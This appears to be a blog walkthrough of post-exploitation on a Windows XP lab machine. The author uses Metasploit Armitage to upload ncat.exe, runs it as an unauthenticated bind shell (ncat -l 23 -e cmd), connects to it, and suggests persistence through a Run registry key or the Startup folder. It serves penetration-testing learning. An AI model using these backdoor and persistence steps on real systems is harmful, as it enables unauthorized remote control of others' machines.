First I exploited my Windows system with Metasploit's Armitage front end, obtaining a Meterpreter shell as described in this post.
Then I needed to upload ncat.exe (which I downloaded from here) to the target machine. In Armitage this is a breeze. Simply right-click the compromised host and choose Meterpreter1 >> Explore >> Browse Files. This gives you a nice list of files on the exploited machine:
Notice the “Upload” button, which transfers files onto the target system. Once the upload completes, refresh and check that the file is indeed in the C:\WINDOWS\system32 directory. Once found, right-click the file and choose “Execute”, which brings up the “Input Arguments” box:
As you can see I entered -l 23 -e cmd, that is: -l (listen) on port 23, and -e (execute) cmd, so that whoever connects to that port is handed a command shell.
I then opened a terminal on the attacking machine and attempted to connect with Ncat to the target machine:
~# ncat 192.168.1.79 23        <-- target IP and the port given to -l
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
And as you can see, the connection was successful and I am sitting at a cmd prompt on the target. I can now close Metasploit and carry on with this connection alone.
It's worth noting that with -e the listener behaved as if it had a “keep alive”: Ncat stayed up and accepted a new connection after I terminated the first one. Ncat's explicit option for this is -k (--keep-open), so pass it if you are relying on being able to reconnect rather than on whatever the default happens to be. Be aware, too, that this is an unauthenticated bind shell: cmd runs with whatever privileges the Meterpreter session had, and anyone else who can reach port 23 on the target gets the same shell. Ncat's --allow option can at least restrict which source addresses are accepted.
It's also worth noting that this is not persistent: once the target machine is rebooted the listener is gone, and the connection is not available again until ncat.exe is executed once more. This can be overcome by ensuring ncat.exe is run at start-up (for example from a Run registry key or the Startup folder).
I'll try to blog the solution to this, and also how to create a reverse connection instead of a bind listener.